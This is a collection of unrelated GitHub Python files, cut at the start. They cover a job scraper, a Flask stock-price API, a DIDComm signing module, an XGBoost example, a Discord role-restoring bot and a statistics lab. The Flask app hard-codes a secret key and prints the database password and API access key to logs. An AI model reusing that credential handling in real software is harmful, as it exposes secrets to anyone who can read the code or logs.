attrs={'class':'topcard__title'}).text\n\n company = soup.find('a', attrs={'class':'sub-nav-cta__optional-url'}).text\n\n location = soup.find('span', attrs={'class':'sub-nav-cta__meta-text'}).text\n\n pay = \"Unknown\" # default pay is unknown\n # gets the pay (only works if it is an explicitly stated hourly pay)\n try:\n p = soup.find_all('p') # get all the p tags\n for i in p: \n if '$' in i.text: # find the p tag that contains the pay\n pay_section = i.text\n pay = pay_section[pay_section.find('$')+1:pay_section.find('$')+7].rstrip() + \"/hour\" # get pay from the p tag and formats it\n break\n except:\n pass\n\n return([job_title, company, location, pay, job_url])\n \n# enters the info into the excel spreadsheet, must pass a list with the job title, company, location, pay, and url\ndef enter_info(info):\n wb = load_workbook(WB_NAME) # load the excel spreadsheet (must be in the same directory as the script)\n page = wb.active\n\n now = datetime.datetime.now()\n date = str(now.month) + '/' + str(now.day)\n\n page.append([info[0], info[1], info[2], info[3], date, info[4]]) # add the job info to the excel spreadsheet\n wb.save(filename=WB_NAME)\n\nif __name__ == \"__main__\":\n main()","repo_name":"andrewlemay/TackleAnyPythonProject","sub_path":"TAPP5_JobInfoToExcel.py","file_name":"TAPP5_JobInfoToExcel.py","file_ext":"py","file_size_in_byte":7931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25651483508","text":"from flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()\n\nfrom flask import Flask, request, jsonify\nfrom .config import Config\nimport requests\nimport os\nfrom .models import EODData, User\nimport datetime\nimport time\n\napp = Flask(__name__)\n\nfrom .auth import auth_required\n\naccess_key = Config.ACCESS_KEY\ndb_username = Config.DB_USERNAME\ndb_password = Config.DB_PASSWORD\ndb_server = Config.DB_SERVER\ndb_name = 'eodtracker_test'\n# DB_URL = Config.DB_URL\nDB_URL = 'postgresql+psycopg2://{user}:{pw}@{url}/{db}'.format(user=db_username, pw=db_password, url=db_server,db=db_name)\napp.config['SQLALCHEMY_DATABASE_URI'] = DB_URL\nprint(app.config['SQLALCHEMY_DATABASE_URI'])\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['APPSETTING_ENVIRONMENT'] = Config.APPSETTING_ENVIRONMENT\napp.config['SECRET_KEY'] = 'JamesB0ndoo7'\n\ndb.init_app(app)\n\nwith app.app_context():\n db.create_all()\n\n\ndef convert_to_unix(date):\n return int(time.mktime(time.strptime(date, '%Y-%m-%d')))\n\n\ndef convert_to_datestr(date):\n return str(datetime.datetime.fromtimestamp(int(date)).strftime('%Y-%m-%dT%H:%M:%S+%fZ'))[:-3]\n\n\n@app.route('/eod', methods=['GET'])\n@auth_required\ndef get_eod_data():\n try:\n if request.args.get('symbol'):\n symbol = request.args.get('symbol')\n else:\n return 'Ticker symbol required.', 400\n\n highest_date = db.session.query(db.func.max(EODData.date)).filter(EODData.symbol == symbol).scalar()\n lowest_date = db.session.query(db.func.min(EODData.date)).filter(EODData.symbol == symbol).scalar()\n original_from_date = 0\n if request.args.get('from_date'):\n from_date = request.args.get('from_date')\n from_date_unix = convert_to_unix(from_date)\n original_from_date = from_date_unix\n else:\n from_date = ''\n from_date_unix = lowest_date\n if request.args.get('to_date'):\n to_date = request.args.get('to_date')\n to_date_unix = convert_to_unix(to_date)\n else:\n to_date = datetime.datetime.utcnow().strftime('%Y-%m-%d')\n to_date_unix = convert_to_unix(datetime.datetime.utcnow().strftime('%Y-%m-%d'))\n\n eod_data_list = []\n\n # Check if the data is in the database\n DB_Check = True\n if len(EODData.query.filter_by(symbol=symbol).limit(1).all()) < 1:\n from_date = \"2008-01-01\"\n from_date_unix = convert_to_unix(from_date)\n DB_Check = False\n\n\n if DB_Check and highest_date is not None and lowest_date is not None and (from_date_unix >= lowest_date) and (\n highest_date >= to_date_unix):\n eod_data = EODData.query.filter_by(symbol=symbol).filter(EODData.date >= from_date_unix).filter(\n EODData.date <= to_date_unix).all()\n if eod_data:\n for each_record in eod_data:\n each_record_dict = each_record.__dict__.copy()\n each_record_dict['date'] = convert_to_datestr(each_record_dict['date'])\n each_record_dict.pop('_sa_instance_state', None)\n each_record_dict.pop('id', None)\n eod_data_list.append(each_record_dict)\n\n return jsonify(DB_data=eod_data_list)\n\n # If the data is not in the database, make the API call to the Marketstack EOD API\n api_url = f'http://api.marketstack.com/v1/eod?access_key={access_key}&symbols={symbol}&date_from={from_date}&date_to={to_date}'\n print(datetime.datetime.now())\n print(api_url)\n response = requests.get(api_url)\n data = response.json()\n\n for record in data['data']:\n record_date_unix = convert_to_unix(record['date'].split(\"T\")[0])\n if record_date_unix >= original_from_date:\n eod_data_list.append({\"symbol\": record['symbol'],\n \"date\": record['date'],\n \"open\": record['open'],\n \"high\": record['high'],\n \"low\": record['low'],\n \"close\": record['close'],\n \"volume\": record['volume']})\n\n existing_record = EODData.query.filter_by(symbol=record['symbol']).filter_by(date=record_date_unix).first()\n if existing_record is None:\n eod_data = EODData(symbol=record['symbol'],\n date=record_date_unix,\n open=record['open'],\n high=record['high'],\n low=record['low'],\n close=record['close'],\n volume=record['volume'])\n\n db.session.add(eod_data)\n try:\n db.session.commit()\n except:\n pass\n return jsonify(API_data=eod_data_list)\n except Exception as e:\n print(e)\n return \"Invalid request\", 400\n\n\n@app.route('/change-in-price', methods=['GET'])\n@auth_required\ndef change_in_price():\n # Get the symbol and number of days from the request query parameters\n symbol = request.args.get('symbol')\n num_days = request.args.get('num_days')\n if app.config['APPSETTING_ENVIRONMENT'] == 'production':\n return 'This endpoint is not available in the current environment', 404\n\n # Get the data for the given symbol from the database and Calculate the change in price\n eod_data = EODData.query.filter_by(symbol=symbol).order_by(EODData.date.desc()).limit(num_days).all()\n if eod_data:\n change_in_price = eod_data[0].close - eod_data[-1].close\n return f'The change in price for {symbol} over the past {num_days} days is {change_in_price}. Note-Difference calculation is done only for the data available in database. '\n else:\n return 'Symbol/Ticker is not available in DB'\n\n\n@app.route('/')\ndef index():\n try:\n webapp_env = os.environ['APPSETTING_ENVIRONMENT']\n img_id = os.environ['imageid']\n except:\n webapp_env = ''\n img_id = ''\n return '

    Hello, You are in ' + str(webapp_env) + ' environment. We are using image - '+str(img_id)+'

    '\n\n\nif __name__ == \"__main__\":\n port = 80\n app.run(host=\"0.0.0.0\", port=port)\n","repo_name":"harsharede/eodtracker_CI","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27013987340","text":"from __future__ import annotations\n\nfrom dataclasses import dataclass\nfrom typing import Optional, Union\n\nfrom didcomm.common.resolvers import ResolversConfig\nfrom didcomm.common.types import JSON, DID_OR_DID_URL, DID_URL, JSON_OBJ\nfrom didcomm.core.serialization import dict_to_json\nfrom didcomm.core.sign import sign\nfrom didcomm.core.utils import is_did\nfrom didcomm.errors import DIDCommValueError\nfrom didcomm.core.from_prior import pack_from_prior_in_place\nfrom didcomm.message import Message\n\n\nasync def pack_signed(\n resolvers_config: ResolversConfig,\n message: Union[Message, JSON_OBJ],\n sign_frm: DID_OR_DID_URL,\n pack_params: Optional[PackSignedParameters] = None,\n) -> PackSignedResult:\n \"\"\"\n Produces `DIDComm Signed Message`\n https://identity.foundation/didcomm-messaging/spec/#didcomm-signed-message.\n\n The method signs (non-repudiation added) the message keeping it unencrypted.\n\n Signed messages are only necessary when\n - the origin of plaintext must be provable to third parties\n - or the sender can’t be proven to the recipient by authenticated encryption because the recipient\n is not known in advance (e.g., in a broadcast scenario).\n\n Adding a signature when one is not needed can degrade rather than enhance security because it\n relinquishes the sender’s ability to speak off the record.\n\n Signing is done as follows:\n - Signing is done via the keys from the `authentication` verification relationship in the DID Doc\n for the DID to be used for signing\n - If `sign_frm` is a DID, then the first sender's `authentication` verification method is used for which\n a private key in the _secrets resolver is found\n - If `sign_frm` is a key ID, then the sender's `authentication` verification method identified by the given key ID is used.\n\n :param resolvers_config: secrets and DIDDoc resolvers\n :param message: The message to be packed into a DIDComm message\n :param sign_frm: DID or key ID the sender uses for signing.\n :param pack_params: Optional parameters for pack\n\n :raises DIDDocNotResolvedError: If a DID can not be resolved to a DID Doc.\n :raises DIDUrlNotFoundError: If a DID URL (for example a key ID) is not found within a DID Doc\n :raises SecretNotFoundError: If there is no secret for the given DID or DID URL (key ID)\n :raises DIDCommValueError: If invalid input is provided.\n\n :return: PackSignedResult\n \"\"\"\n pack_params = pack_params or PackSignedParameters()\n\n __validate(sign_frm)\n\n if isinstance(message, Message):\n message = message.as_dict()\n\n from_prior_issuer_kid = await pack_from_prior_in_place(\n message,\n resolvers_config,\n pack_params.from_prior_issuer_kid,\n )\n\n sign_result = await sign(message, sign_frm, resolvers_config)\n packed_msg = dict_to_json(sign_result.msg)\n\n return PackSignedResult(\n packed_msg=packed_msg,\n sign_from_kid=sign_result.sign_frm_kid,\n from_prior_issuer_kid=from_prior_issuer_kid,\n )\n\n\n@dataclass(frozen=True)\nclass PackSignedResult:\n \"\"\"\n Result of pack operation.\n\n Attributes:\n packed_msg (str): A packed message as a JSON string\n sign_from_kid (DID_URL): Identifier (DID URL) of sender key used for message signing\n from_prior_issuer_kid (DID_URL): Identifier (DID URL) of issuer key used for signing from_prior.\n None if the message does not contain from_prior.\n \"\"\"\n\n packed_msg: JSON\n sign_from_kid: DID_URL\n from_prior_issuer_kid: Optional[DID_URL] = None\n\n\n@dataclass\nclass PackSignedParameters:\n \"\"\"\n Optional parameters for pack.\n\n Attributes:\n from_prior_issuer_kid (DID_URL): If from_prior is specified in the source message,\n this field can explicitly specify which key to use for signing from_prior\n in the packed message\n \"\"\"\n\n from_prior_issuer_kid: Optional[DID_URL] = None\n\n\ndef __validate(sign_frm: DID_OR_DID_URL):\n if not is_did(sign_frm):\n raise DIDCommValueError(\n f\"`sign_from` value is not a valid DID of DID URL: {sign_frm}\"\n )\n","repo_name":"sicpa-dlab/didcomm-python","sub_path":"didcomm/pack_signed.py","file_name":"pack_signed.py","file_ext":"py","file_size_in_byte":4191,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"70093587047","text":"\"\"\"!\nadd new text information to textinfo.json\n\"\"\"\n\nimport argparse\nimport os\nfrom agsearch.utils import DATA_DIR, add_to_text_info_db\nfrom agsearch.textinfo import TextInfo\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Add textinfo to database\")\n parser.add_argument(\"text_id\", help=\"Text Identifier for the textinfo database\")\n parser.add_argument(\n \"local_text_path\",\n help=\"Text path for adding to textinfo database. It should be given relative to textinfo.json file\",\n )\n parser.add_argument(\n \"has_chunks\",\n help=\"If text has chunks (columns, lines etc), we segment them during processing\",\n type=int,\n choices=[0, 1],\n )\n parser.add_argument(\n \"--chunk_sep\",\n help=\"Chunk separator assumed to be newline char \\\\n by default\",\n default=\"\\n\",\n )\n parser.add_argument(\"--url\", help=\"Text url for the path\")\n args = parser.parse_args()\n tpath = args.local_text_path\n tpath = os.path.join(DATA_DIR, tpath)\n if not os.path.isfile(tpath):\n raise ValueError(\"text path does not exist \" + tpath)\n\n info = {\n args.text_id: {\n \"has_chunks\": bool(args.has_chunks),\n \"chunk_separator\": args.chunk_sep,\n \"url\": args.url,\n \"local_path\": args.local_text_path,\n }\n }\n add_to_text_info_db(info=info)\n","repo_name":"D-K-E/agsearch-python","sub_path":"agsearch/add_textinfo.py","file_name":"add_textinfo.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16542979421","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# 导入常用包\nimport xgboost as xgb\nimport numpy as np\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.feature_selection import SelectFromModel\n\n\n# In[2]:\n\n\n# 数据集\ncancer = datasets.load_breast_cancer()\nX = cancer.data\nY = cancer.target\n\n\n# In[3]:\n\n\n# 数据集的情况\n# X.shape\n# Y.shape\n# X, Y\n\n\n# In[4]:\n\n\n# 拆分训练集、测试集\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 1/5., random_state = 8)\n\n\n# In[5]:\n\n\nxgb_train = xgb.DMatrix(X_train, label = Y_train)\nxgb_test = xgb.DMatrix(X_test, label = Y_test)\n\n\n# In[6]:\n\n\nparams = {\"objective\": \"binary:logistic\",\n \"booster\": \"gbtree\",\n \"eta\": 0.1,\n \"max_depth\": 5\n }\n\n\n# In[7]:\n\n\nnum_round = 50\n\n\n# In[8]:\n\n\nwatchlist = [(xgb_test, 'eval'), (xgb_train, 'train')]\n\n\n# In[9]:\n\n\nbst = xgb.train(params, xgb_train, num_boost_round = 20, evals = watchlist)\n\n\n# In[10]:\n\n\n# output_margin 参数设为 True,表示最终输出的预测值为未进行 sigmoid 转化的原始值\npred_test = bst.predict(xgb_test, output_margin = True)\npred_test_sigmoid = bst.predict(xgb_test)\n\n\n# In[11]:\n\n\n# 将 原始值进行 sigmoid 转化\n1.0 / (1.0 + np.exp(-pred_test[:30]))\n\n\n# In[12]:\n\n\n# 和原始值进行 simoid 转化的值进行逐一比较\npred_test_sigmoid[:30]\n\n","repo_name":"calxu/xgboost_learning","sub_path":"1_binary_classification/6_predict_2/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"73252223527","text":"from pylab import*\nfrom scipy.integrate import quad\nimport numpy as np\nimport os\n\n#paths\nmy_path = os.path.abspath(r\"C:\\Users\\Heine\\Desktop\\Skole\\FYS4150_Comp_Fys\\FYS4150\\Exercise_1\\plot\")\nos.chdir(r\"C:\\Users\\Heine\\Desktop\\Skole\\FYS4150_Comp_Fys\\FYS4150\\Exercise_1\\plot\")\n\nfile = np.loadtxt(\"10e6task_c.txt\", dtype = 'float', skiprows = 2, usecols = (0,1,2))\n\nfile_lenght = str(len(file))\nfile_header = \"Number of iterations \" + file_lenght\n#print file , file_lenght\n\n\n#Plotting\nfig = figure()\ngrid(True, which = 'both')#, ls= '-')\ngrid('on')\n\nplot(file[:,0],file[:,1],'r-', label = '$approx. solutin$ ') \nplot(file[:,0],file[:,2],'b-', label = '$exact solution$ ') \n\nxlabel(r'$x$', size = 20,labelpad= 5 )\nylabel(r'$f(x)$',size = 20, labelpad = 5)\ntitle(file_header)\nlegend(loc='smart')\nfig.savefig('10e6ex_c.png')\nshow()\n","repo_name":"heinehn/FYS4150","sub_path":"Exercise_1/plot/plot_from_file.py","file_name":"plot_from_file.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74476540967","text":"from datetime import datetime\nimport discord\nfrom discord.ext import commands\nimport logging\nimport sys\n\nimport sub\nimport text\n\nintents = discord.Intents.default()\nintents.members = True\nbot = commands.Bot(command_prefix = text.PREFIXES, intents = intents)\n\n@bot.event\nasync def on_ready():\n line = f\"on_ready {discord.__version__}\"\n logging.info(line)\n print(line)\n\ndef get_current_datetime_str():\n return str(datetime.now()).replace(':', '-')\n\ndef update_logging_file():\n logging.basicConfig(filename=f\"log/{get_current_datetime_str()}.log\", encoding=\"utf-8\", level=logging.DEBUG)\n\nlogging_count = 0\nupdate_logging_file()\n\n@bot.event\nasync def on_error(event, *args, **kwargs):\n info = sys.exc_info()\n line = f\"{get_current_datetime_str()}\\t{event}\\t{str(info)}\"\n logging.error(line)\n print(line)\n \n global logging_count\n logging_count += 1\n if logging_count > 200:\n update_logging_file()\n\n@bot.command()\nasync def b(ctx: commands.Context):\n await sub.begin(ctx)\n\n@bot.command()\nasync def begin(ctx: commands.Context):\n await sub.begin(ctx)\n\n@bot.command()\nasync def o(ctx: commands.Context):\n await sub.open(ctx)\n\n@bot.command(\"open\")\nasync def _open(ctx: commands.Context):\n await sub.open(ctx)\n\n@bot.command()\nasync def c(ctx: commands.Context):\n await sub.close(ctx)\n\n@bot.command()\nasync def join(ctx: commands.Context):\n await sub.close(ctx)\n\n@bot.command()\nasync def k(ctx: commands.Context, arg: str = None):\n await sub.kill(ctx, arg)\n\n@bot.command()\nasync def kill(ctx: commands.Context, arg: str = None):\n await sub.kill(ctx, arg)\n\n@bot.command()\nasync def r(ctx: commands.Context):\n await sub.reset(ctx)\n\n@bot.command()\nasync def reset(ctx: commands.Context):\n await sub.reset(ctx)\n\n@bot.command()\nasync def e(ctx: commands.Context):\n await sub.end(ctx)\n\n@bot.command()\nasync def end(ctx: commands.Context):\n await sub.end(ctx)\n\n@bot.event\nasync def on_message(message: discord.Message):\n if message.author.bot:\n return\n\n if bot.user.id in [member.id for member in message.mentions]:\n await sub.begin(commands.Context(message = message, prefix = ''))\n return\n \n for prefix in text.PREFIXES:\n if prefix == message.content:\n await message.channel.send(text.HELP_TEXT)\n return\n \n await bot.process_commands(message)\n\n@bot.event\nasync def on_reaction_add(reaction: discord.Reaction, user):\n await sub.on_reaction_add(reaction, user)\n\n@bot.event\nasync def on_reaction_remove(reaction: discord.Reaction, user):\n await sub.on_reaction_remove(reaction, user)\n\n@bot.event\nasync def on_voice_state_update(member: discord.Member, before: discord.VoiceState, after: discord.VoiceState):\n await sub.on_voice_state_update(member, before, after)\n\nwith open(\"./token.txt\", encoding = \"utf-8\") as file:\n token = file.read()\nbot.run(token)","repo_name":"HotariTobu/AUBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3452965981","text":"import torch\nfrom diffusers import UNet2DConditionModel\n\nunet = UNet2DConditionModel.from_pretrained(\"CompVis/stable-diffusion-v1-4\",\n torch_dtype=torch.float16,\n\t\t\t\t\t\t\t\t\t\t\trevision=\"fp16\",\n subfolder=\"unet\")\nunet.cuda(1)\ninputs = torch.randn(2, 4, 64, 64, dtype=torch.half, device='cuda:1'), torch.tensor([1, 3], dtype=torch.int32, device='cuda:1'), torch.randn(2, 77, 768, dtype=torch.half, device='cuda:1')\n\nimport fastldm.modules as fm\nfrom fastldm.modifier import modify, MODIFIER\nmap_dict = {\n torch.nn.LayerNorm: fm.LayerNorm,\n torch.nn.GroupNorm: fm.GroupNorm,\n}\nunet = modify(unet, map_dict)\n\nfrom fastldm.experiment import experiment_onnx, experiment_trt\nfrom fastldm.environ import ONNX_ONLY\nif ONNX_ONLY:\n measure, var, outputs = experiment_onnx(unet, inputs)\nelse:\n measure, var, outputs = experiment_trt(unet, inputs)\n\nprint(var)\nbreakpoint()\nfor i in range(len(outputs[type(unet).__name__])):\n out_model = outputs[type(unet).__name__][i].cpu()\n out_ort = outputs['TRTModule'][i].cpu()\n\n from fastldm.helper import profile_outdiff\n measure = profile_outdiff(out_model, out_ort)\n # print(measure)\n import pprint \n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(measure)\n breakpoint()","repo_name":"THUDM/FastLDM","sub_path":"examples/transform_diffusers_unet.py","file_name":"transform_diffusers_unet.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"27716228084","text":"import gzip\n\ndef list_tables(tables):\n \"\"\"\n This function prints the list of tables.\n \n Parameters\n ----------\n tables: \n List of tables in the database\n\n Returns\n -------\n None\n \"\"\"\n\n print(\"\\nLIST OF TABLES: \")\n counter = 1\n for table in tables:\n row = f'{counter}. {table[0]}'\n print(row)\n counter+=1\n\ndef format_table(filepath):\n \"\"\"\n This function formats the data to ingest in the database. (Input has to be a gzip file).\n \n Parameters\n ----------\n filepath: str\n Path to where the gzip file is. Specific format of the data is needed\n\n Returns\n -------\n column_names: list\n List of column names\n primary_key: tuple\n Tuple of columns that constitutes the primary key\n db_types: list\n List of types for each colunm\n rows_values: list\n List of rows of the table\n \"\"\"\n if filepath.endswith('.gz'):\n with gzip.open(filepath, \"rb\") as f:\n #Split the data line by line and extract the metadata of th table\n rows = f.read().split(b'\\x02\\n')\n column_names = [el.decode('utf-8').replace('#', '') for el in rows[0].split(b'\\x01')]\n primary_key = tuple([el.decode('utf-8').replace('#primaryKey:', '') for el in rows[1].split(b'\\x01')])\n db_types = [el.decode('utf-8').replace('#dbTypes:', '') for el in rows[2].split(b'\\x01')]\n rows_values = []\n for row in rows:\n if not row.startswith(b'#') and len(row)>0:\n rows_values.append(tuple([el.decode('utf-8') for el in row.split(b'\\x01')]))\n return column_names, primary_key, db_types, rows_values\n else:\n print(\"Error: Input file is not a gzip file.\")\n\ndef create_table_query(column_names, db_types, table):\n \"\"\"\n This function returns the sql query for creating a table.\n \n Parameters\n ----------\n column_names: list\n List of column names\n db_types: list\n List of types for each colunm\n table: str\n Name for the table to create in the database\n\n Returns\n -------\n full_query: list\n Sql query for creating the table\n \"\"\"\n\n n_columns = len(column_names)\n columns_query = f'({column_names[0]} {db_types[0]}, '\n for ii in range(1, n_columns):\n columns_query = columns_query + column_names[ii] + ' ' + db_types[ii] + ', '\n columns_query = columns_query[:-2]+')'\n\n full_query = f\"CREATE TABLE {table} {columns_query}\"\n\n return full_query\n\ndef insert_rows_query(column_names, table):\n \"\"\"\n This function returns the sql query for inserting rows to a table.\n \n Parameters\n ----------\n column_names: list\n List of column names\n table: str\n Name for the table to create in the database\n\n Returns\n -------\n full_query: list\n Sql query for inserting rows to the table\n \"\"\"\n\n columns_query = \"(\"\n for col in column_names:\n columns_query = columns_query + col + \", \"\n columns_query = columns_query[:-2]+')'\n\n full_query = f\"INSERT IGNORE INTO {table} \" + columns_query + \" VALUES (\" + \"%s, \"*(len(column_names)-1) + \"%s)\"\n \n return full_query\n\ndef see_table(table_columns, table_preview):\n \"\"\"\n This function prints a table.\n \n Parameters\n ----------\n table_columns: list\n List of column names\n table_preview: list\n Rows of the table to show\n\n Returns\n -------\n None\n \"\"\"\n\n column_names = [str(el[0]) for el in table_columns]\n format_str = \"|\" + \" {:^16} |\"*len(column_names)\n print(format_str.format(*column_names))\n print(\"-\"*len(format_str.format(*column_names)))\n for row in table_preview:\n print(format_str.format(*row))\n","repo_name":"mariohenao/max-cli","sub_path":"project/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33486872465","text":"# coding=utf-8\nimport json\nimport discord\nimport random\nimport constant\n\ndiscordNew = discord\n\nintents = discord.Intents.default()\nintents.members = True\n\nclient = discord.Client(intents=intents)\n\nwith open(file='config.json', mode='r') as file:\n config = json.load(file)\n\nbotId = config['botId']\n\n\ndef checkAutorNotBot(message):\n if not message.author == client.user:\n return True\n else:\n return False\n\n\ndef get_info(message):\n channel = client.get_channel(config['start_channel'])\n members = channel.members\n users_array = []\n for item in members:\n role_array = []\n for item_role in item.roles:\n role_id = item_role.id\n role_array.append(role_id)\n user = {'user_id': item.id, 'user_roles': role_array}\n users_array.append(user)\n users_json = {'users': users_array}\n with open(file='./files/users.json', mode='w', encoding=\"utf-8\") as file:\n json.dump(users_json, file, ensure_ascii=False)\n pass\n\n\nasync def set_start_channel(message):\n global config\n message_content = message.content\n await message.delete()\n with open(file='config.json', mode='r') as file:\n config_for_bot = json.load(file)\n config_for_bot['start_channel'] = message_content.split(' ')[-1]\n with open(file='config.json', mode='w', encoding=\"utf-8\") as file:\n json.dump(config_for_bot, file, ensure_ascii=False)\n with open(file='config.json', mode='r') as file:\n config = json.load(file)\n pass\n\n\n@client.event\nasync def on_ready():\n constant.init()\n constant.client = client\n print('бот запущен')\n pass\n\n\nasync def removeOldMessage(message):\n async for messageItem in message.channel.history(limit=1000):\n if not messageItem.id == message.id and not messageItem.pinned:\n await messageItem.delete()\n pass\n\n\n@client.event\nasync def on_message(message):\n if checkAutorNotBot(message):\n if message.content.startswith(\"-set_banner\"):\n print(message.guild.banner)\n guild = message.guild\n await guild.set_banner_url(message.attachment[0].proxy_url)\n if message.content.startswith(\"-clear\"):\n await message.delete()\n await removeOldMessage(message)\n if message.content.startswith(\"-get_info\"):\n get_info(message)\n if message.content.startswith(\"-set_start_channel\"):\n await set_start_channel(message)\n return\n\n\n@client.event\nasync def on_member_join(member):\n roles_array = []\n with open(file='./files/users.json', mode='r') as file:\n users_json = json.load(file)\n for user in users_json['users']:\n if user['user_id'] == member.id:\n roles_array = user['user_roles']\n display_name = user['display_name']\n guild = member.guild\n await member.edit(nick=display_name)\n for role_id in roles_array:\n role = guild.get_role(role_id) # получаем объект роли*\n if not role.name == '@everyone':\n await member.add_roles(role)\n\n\ndef get_roles_array(member):\n roles_array = []\n for role_item in member.roles:\n role = role_item.id\n roles_array.append(role)\n return roles_array\n\n\n@client.event\nasync def on_member_remove(member):\n roles_array = []\n new_user = True\n display_name = member.display_name\n with open(file='./files/users.json', mode='r') as file:\n users_json = json.load(file)\n for user in users_json['users']:\n if user['user_id'] == member.id:\n new_users = False\n roles_array = get_roles_array(member)\n user['user_roles'] = get_roles_array(member)\n try:\n user['display_name'] = display_name\n except:\n users_json.remove(user)\n user_new = {'user_id': member.id,\n 'user_roles': roles_array,\n 'display_name': display_name}\n users_json.append(user_new)\n if new_user:\n user_new = {'user_id': member.id,\n 'user_roles': get_roles_array(member),\n 'display_name': display_name}\n users_json['users'].append(user_new)\n with open(file='./files/users.json', mode='w', encoding=\"utf-8\") as file:\n json.dump(users_json, file, ensure_ascii=False)\n print(member)\n\n\nworkSpace = 'production'\nclient.run(config['tokenDiscordProd'])\n\n# python3 -m pip install -U discord.py\n# pip install -U discord-py-slash-command\n# pip install -U discord_components\n# pip3 install discord\n","repo_name":"mamadraArtStation/pluton","sub_path":"pluton.py","file_name":"pluton.py","file_ext":"py","file_size_in_byte":4738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23674247469","text":"\"\"\"\nCSCI 150 Lab 5\n\nName: Finn Ellingwood\n\nCreativity: \n\nEnter file to analyze: 95age.txt\nFile contained 35326 entries\nMax: 90\nMin: 0 (anyone who was born in 1995 would be 0)\nAverage: 35.73141595425466\nMedian: 34.0\nStd. dev: 22.54500613160593\n\nEnter file to analyze: 95income.txt\nFile contained 35326 entries\nMax: 304998\nMin: -13411 (this would represent a loss of money)\nAverage: 16974.277925607203\nMedian: 8929.5\nStd. dev: 22838.78036356643\n\nEnter file to analyze: 95kids.txt\nFile contained 35326 entries\nMax: 9 (a lot of kids!)\nMin: 0\nAverage: 0.43285398856366414\nMedian: 0.0\nStd. dev: 0.8975902261264251\n\"\"\"\n\nimport os.path\n\nlist = []\n\ndef data_analysis():\n \"\"\"\n Asks the user to input an existing txt file to be read into\n a list and uses said list to calculate given statistics about it such\n as max, min, median, average, and standard deviation.\n \n Args:\n None\n \n Returns:\n Nothing\n \"\"\"\n \n file = input(\"Enter file to analyze: \")\n \n if open_file(file):\n return\n \n # Work with file object\n # File is automatically closed when you exit the with block\n element_num = len(list)\n \n if len(list) == 0:\n print(\"File contained 0 entries\")\n else:\n print(\"File contained \"+str(element_num)+\" entries\")\n maxi = max(list)\n mini = min(list)\n total = sum(list)\n avg = total / element_num\n median = middle(list)\n dev = stdev(list)\n \n print(\"Max:\",maxi)\n print(\"Min:\",mini)\n print(\"Average:\",avg)\n print(\"Median:\",median)\n print(\"Std. dev:\",dev)\n \n \ndef open_file(file):\n \"\"\"\n Opens the given file and reads it into a list to be used later\n \n Args:\n file: an existing txt file\n \n Returns:\n A list of integers pulled from the txt file\n \"\"\"\n if os.path.exists(file):\n with open(file, \"r\") as file:\n for line in file:\n # Assumes one entry per line \n # (remember to strip newline from end of line)\n list.append(int(line))\n else:\n print(\"\\033[3;31mERROR LOCATING SPECIFIED FILE!\\033[0;0m\")\n return True\n \ndef middle(list):\n \"\"\"\n Calculates the standard deviation of a given list of integers\n \n Args:\n list: a list of integers in any order to be sorted\n \n Returns:\n The median of the given list either as an integer if the\n list is odd or average between the two middle values if the list\n is even\n \"\"\"\n sorted_list = sorted(list)\n \n if len(sorted_list) % 2 == 1:\n midd = int(len(sorted_list) // 2)\n midd = sorted_list[midd]\n else:\n midd = int(len(sorted_list) // 2)\n midd = (sorted_list[midd] + sorted_list[midd - 1]) / 2\n return midd\n\ndef stdev(list):\n \"\"\"\n Calculates the standard deviation of a given list\n \n Args:\n list: a list of integers in any order\n \n Returns:\n The standard deviation of the given list as a float\n \"\"\"\n n = len(list)\n mean = sum(list) / n\n var = sum((x - mean) ** 2 for x in list) / (n - 1)\n std_dev = var ** .5\n return std_dev\n\ndef frequencies(data):\n \n \"\"\"\n Attempts to print the frequency of each item in the list data\n \n Args:\n data: List of \"sortable\" data items\n \"\"\"\n data.sort()\n \n count = 0\n previous = data[0]\n\n print(\"data\\tfrequency\") # '\\t' is the TAB character\n\n for d in data:\n if d == previous:\n # Same as the previous, increment the count for the run\n count += 1\n else:\n # We've found a different item so print out the old and reset the count\n print(str(previous) + \"\\t\" + str(count))\n count = 1\n \n previous = d\n print(str(data[-1]) + \"\\t\" + \"1\")\n \n# Main program that gets executed when program is run\n# (Leave this as is, no changes to be made)\nif __name__ == '__main__':\n # This invokes the data_analysis function when the program is run\n data_analysis()\n","repo_name":"Norvoke/middcs150","sub_path":"Week 6/lab5_data_analysis1.py","file_name":"lab5_data_analysis1.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19024488278","text":"# Write a Python program to replace last value of tuples in a list\n# Sample list: [(10, 20, 40), (40, 50, 60), 